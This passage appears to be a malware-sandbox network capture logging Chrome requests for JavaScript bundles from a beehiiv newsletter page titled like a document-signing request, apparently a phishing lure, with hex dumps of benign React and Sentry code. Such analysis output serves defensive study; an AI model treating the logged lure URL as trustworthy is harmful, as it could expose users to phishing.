                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="fd77d185-6d6e-5555-b201-070d4e61cd72")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC567INData Raw: 2e 73 65 61 72 63 68 2c 63 3d 6e 2e 73 65 61 72 63 68 2e 69 6e 63 6c 75 64 65 73 28 22 76 65 72 73 69 6f 6e 3d 64 72 61 66 74 22 29 3b 65 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 21 74 26 26 63 26 26 73 28 22 2e 22 2c 7b 72 65 70 6c 61 63 65 3a 21 30 7d 29 7d 2c 5b 73 2c 74 2c 63 5d 29 3b 63 6f 6e 73 74 20 72 3d 65 2e 75 73 65 43 61 6c 6c 62 61 63 6b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 28 69 2c 7b 72 65 70 6c 61 63 65 3a 21 30 7d 29 7d 2c 5b 73 2c 69 5d 29 3b 72 65 74 75 72 6e 20 65 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 6d 3d 3e 7b 63 6f 6e 73 74 7b 64 61 74 61 3a 61 7d 3d 6d 3b 61 3f 2e 70 75 62 6c 69 63 61 74 69 6f 6e 49 64 3d 3d 3d 75 26 26 74 26 26 28 61 3f 2e 73 74 61 74 75 73 3d 3d 3d 22 72 65 66 72 65 73
                                                                                                                                            Data Ascii: .search,c=n.search.includes("version=draft");e.useEffect(()=>{!t&&c&&s(".",{replace:!0})},[s,t,c]);const r=e.useCallback(function(){s(i,{replace:!0})},[s,i]);return e.useEffect(()=>{const o=m=>{const{data:a}=m;a?.publicationId===u&&t&&(a?.status==="refres


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            133192.168.2.1649860104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC559OUTGET /assets/LockClosedIcon-BluoCUMI.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC901INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1680
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"690-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c0b8fa726b-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC468INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 61 62 34 62 65 66 65 32 2d 35 63 65 61 2d 35 34 61 34 2d 39 34 64 32 2d 63 36 66 62 63 30 65 35 63 30 64 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab4befe2-5cea-54a4-94d2-c6fbc0e5c0d1")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1212INData Raw: 68 69 64 64 65 6e 22 3a 22 74 72 75 65 22 2c 22 64 61 74 61 2d 73 6c 6f 74 22 3a 22 69 63 6f 6e 22 2c 72 65 66 3a 6c 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 72 7d 2c 74 29 2c 61 3f 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 7b 69 64 3a 72 7d 2c 61 29 3a 6e 75 6c 6c 2c 65 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 31 2e 36 34 35 20 32 30 2e 39 31 2d 2e 30 30 37 2d 2e 30 30 33 2d 2e 30 32 32 2d 2e 30 31 32 61 31 35 2e 32 34 37 20 31 35 2e 32 34 37 20 30 20 30 20 31 2d 2e 33 38 33 2d 2e 32 31 38 20 32 35 2e 31 38 20 32 35 2e 31 38 20 30 20 30 20 31 2d 34 2e 32 34 34 2d 33 2e 31 37 43 34 2e 36 38 38 20 31 35 2e 33 36 20 32 2e 32 35 20 31 32 2e 31 37 34 20 32 2e 32 35 20 38
                                                                                                                                            Data Ascii: hidden":"true","data-slot":"icon",ref:l,"aria-labelledby":r},t),a?e.createElement("title",{id:r},a):null,e.createElement("path",{d:"m11.645 20.91-.007-.003-.022-.012a15.247 15.247 0 0 1-.383-.218 25.18 25.18 0 0 1-4.244-3.17C4.688 15.36 2.25 12.174 2.25 8


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            134192.168.2.1649861104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC840OUTGET /assets/index-CCu-G_ty.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1147
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"47b-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c15e820f74-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 65 34 64 36 65 63 32 34 2d 63 62 61 36 2d 35 30 64 33 2d 38 36 62 63 2d 34 33 63 66 38 64 38 33 62 62 37 66 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e4d6ec24-cba6-50d3-86bc-43cf8d83bb7f")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC690INData Raw: 6c 5f 73 65 63 74 69 6f 6e 2e 74 68 65 6d 65 2e 74 65 78 74 5f 63 6f 6c 6f 72 7c 7c 22 22 3b 72 65 74 75 72 6e 20 65 2e 6a 73 78 28 22 75 6c 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 77 72 61 70 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 20 74 65 78 74 2d 78 73 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 2c 63 68 69 6c 64 72 65 6e 3a 73 2e 6d 61 70 28 28 74 2c 72 29 3d 3e 65 2e 6a 73 78 28 61 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 73 28 22 6c 69 22 2c 7b 73 75 70 70 72 65 73 73 48 79 64 72 61 74 69 6f 6e 57 61 72 6e 69 6e 67 3a 21 30 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 20 74 65 78 74 2d 77 74 2d 74 65 78 74
                                                                                                                                            Data Ascii: l_section.theme.text_color||"";return e.jsx("ul",{className:"flex flex-wrap items-center gap-2 text-xs font-semibold",children:s.map((t,r)=>e.jsx(a.Fragment,{children:e.jsxs("li",{suppressHydrationWarning:!0,className:"flex items-center gap-2 text-wt-text


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            135192.168.2.1649862104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC840OUTGET /assets/index-D5Hq4kiz.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 3385
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"d39-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c1ccac8c96-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC457INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 38 61 65 30 38 33 35 2d 33 65 34 30 2d 35 64 64 32 2d 38 31 35 62 2d 33 63 31 31 31 63 34 62 64 33 39 63 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="18ae0835-3e40-5dd2-815b-3c111c4bd39c")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6f 6d 22 2e 2f 49 6d 61 67 65 2d 79 63 41 5f 41 46 4c 72 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 54 20 61 73 20 6d 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 42 64 70 41 50 70 64 4e 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 76 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 4c 20 61 73 20 79 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 53 70 61 72 6b 6c 65 73 49 63 6f 6e 2d 44 41 34 68 73 63 32 61 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 46 20 61 73 20 7a 7d 66 72 6f 6d 22 2e 2f 4c 6f 63 6b 43 6c 6f 73 65 64 49 63 6f 6e 2d 42 6c 75 6f 43 55 4d 49 2e 6a 73 22 3b 63
                                                                                                                                            Data Ascii: om"./Image-ycA_AFLr.js";import{T as m}from"./index-BdpAPpdN.js";import{u as v}from"./useTranslation-CfKJAmGY.js";import{L as y}from"./components-Oj2xMfGE.js";import{F as N}from"./SparklesIcon-DA4hsc2a.js";import{F as z}from"./LockClosedIcon-BluoCUMI.js";c
                                                                                                                                            2025-01-15 18:14:39 UTC1369INData Raw: 6c 65 5f 66 65 61 74 75 72 65 64 5f 70 6f 73 74 5f 62 61 64 67 65 73 26 26 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 62 2d 32 22 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6a 73 78 28 63 2c 7b 74 68 65 6d 65 3a 74 2e 77 65 62 5f 74 68 65 6d 65 2e 63 6f 6e 74 65 6e 74 5f 74 68 65 6d 65 2c 74 65 78 74 3a 64 28 22 70 6f 73 74 73 2e 66 65 61 74 75 72 65 64 22 29 2c 69 63 6f 6e 3a 65 2e 6a 73 78 28 4e 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 7a 2d 31 30 20 68 2d 33 2e 35 20 77 2d 33 2e 35 22 7d 29 7d 29 7d 29 2c 77 26 26 65 2e 6a 73 78 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 73 28 22 7a 2d 31 30 20 63 6f 6c 2d 73 70 61 6e 2d 31 20 77 2d 66 75 6c 6c 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 20 72 6f 75 6e 64 65 64 2d
                                                                                                                                            Data Ascii: le_featured_post_badges&&e.jsx("div",{className:"mb-2",children:e.jsx(c,{theme:t.web_theme.content_theme,text:d("posts.featured"),icon:e.jsx(N,{className:"z-10 h-3.5 w-3.5"})})}),w&&e.jsx("div",{className:s("z-10 col-span-1 w-full overflow-hidden rounded-
                                                                                                                                            2025-01-15 18:14:39 UTC190INData Raw: 61 6e 22 2c 7b 63 68 69 6c 64 72 65 6e 3a 22 20 2f 20 22 7d 29 2c 65 2e 6a 73 78 28 22 74 69 6d 65 22 2c 7b 64 61 74 65 54 69 6d 65 3a 72 2e 6f 76 65 72 72 69 64 65 5f 73 63 68 65 64 75 6c 65 64 5f 61 74 7d 29 5d 7d 29 5d 7d 29 5d 7d 29 7d 3b 65 78 70 6f 72 74 7b 45 20 61 73 20 50 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 6e 64 65 78 2d 44 35 48 71 34 6b 69 7a 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 31 38 61 65 30 38 33 35 2d 33 65 34 30 2d 35 64 64 32 2d 38 31 35 62 2d 33 63 31 31 31 63 34 62 64 33 39 63 0a
                                                                                                                                            Data Ascii: an",{children:" / "}),e.jsx("time",{dateTime:r.override_scheduled_at})]})]})]})};export{E as P};//# sourceMappingURL=index-D5Hq4kiz.js.map//# debugId=18ae0835-3e40-5dd2-815b-3c111c4bd39c


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            136192.168.2.1649863104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC840OUTGET /assets/index-BFDoivjB.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 496
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"1f0-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4166
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8c1ec4742f2-EWR
                                                                                                                                            2025-01-15 18:14:39 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 64 37 31 61 31 32 63 34 2d 65 36 66 61 2d 35 66 64 33 2d 61 35 62 32 2d 63 30 33 30 62 61 32 39 35 39 61 32 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2")}catch(
                                                                                                                                            2025-01-15 18:14:39 UTC38INData Raw: 3d 64 37 31 61 31 32 63 34 2d 65 36 66 61 2d 35 66 64 33 2d 61 35 62 32 2d 63 30 33 30 62 61 32 39 35 39 61 32 0a
                                                                                                                                            Data Ascii: =d71a12c4-e6fa-5fd3-a5b2-c030ba2959a2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            137192.168.2.1649864104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:39 UTC840OUTGET /assets/index-BbnTzeLf.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:39 UTC912INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:39 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 1851
                                                                                                                                            Connection: close
